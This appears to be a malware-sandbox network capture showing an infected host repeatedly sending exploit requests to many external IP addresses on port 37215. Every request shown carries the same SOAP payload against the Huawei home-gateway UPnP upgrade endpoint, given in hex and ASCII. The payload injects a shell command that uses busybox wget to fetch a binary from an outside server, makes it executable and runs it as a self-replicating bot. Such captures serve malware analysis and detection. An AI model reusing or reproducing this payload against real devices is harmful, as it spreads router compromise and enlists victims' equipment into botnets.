6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  35192.168.2.1343536157.197.52.21037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652510881 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  36192.168.2.1342648157.207.9.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652508974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  37192.168.2.1350320157.42.192.2737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652510881 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  38192.168.2.1344542197.151.53.15137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652510881 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  39192.168.2.135248441.194.237.17737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652523041 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  40192.168.2.135639441.223.52.11337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652553082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  41192.168.2.1352184157.181.3.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652580023 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  42192.168.2.1337404157.31.244.23337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652580976 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  43192.168.2.1353132157.162.111.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652585983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  44192.168.2.135940048.58.83.6737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652611971 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  45192.168.2.135762641.106.19.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652698040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
